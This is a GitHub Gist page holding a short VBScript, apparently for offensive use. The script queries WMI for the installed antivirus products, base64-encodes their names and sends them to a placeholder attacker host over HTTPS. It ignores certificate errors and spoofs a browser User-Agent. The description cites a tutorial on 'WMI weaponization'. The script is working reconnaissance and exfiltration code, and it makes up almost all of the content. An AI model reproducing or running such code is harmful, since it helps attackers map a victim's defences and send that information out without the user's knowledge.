Last active
June 6, 2023 08:45
-
-
Save leoloobeek/48a9793424ccf28cbba45940ff65e481 to your computer and use it in GitHub Desktop.
Enumerate AV and send to web server (based on https://blog.netspi.com/getting-started-wmi-weaponization-part-2/)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Base64Encode(sText) | |
| dim DM, EL | |
| Set DM = CreateObject("Microsoft.XMLDOM") | |
| Set EL = DM.createElement("tmp") | |
| EL.DataType = "bin.base64" | |
| EL.NodeTypedValue = sText | |
| Base64Encode = EL.Text | |
| End Function | |
| Set wmiObj=GetObject("winmgmts:{impersonationLevel=impersonate}\\.\ROOT\SecurityCenter2") | |
| Set items = wmiObj.ExecQuery("Select * from AntiVirusProduct") | |
| dim info,id | |
| info = "" | |
| For Each item in items | |
| info = info & item.displayName & "|" | |
| Next | |
| set a = CreateObject("System.Text.ASCIIEncoding") | |
| id = Base64Encode(a.GetBytes_4(info)) | |
| set wc = CreateObject("MSXML2.ServerXMLHTTP") | |
| wc.Open "GET", "https://HOSTNAME/?id=" & id, false | |
| wc.setOption 2, wc.getOption(2) - SXH_SERVER_CERT_IGNORE_ALL_SERVER_ERRORS | |
| wc.setRequestHeader "User-Agent", "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" | |
| wc.Send |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment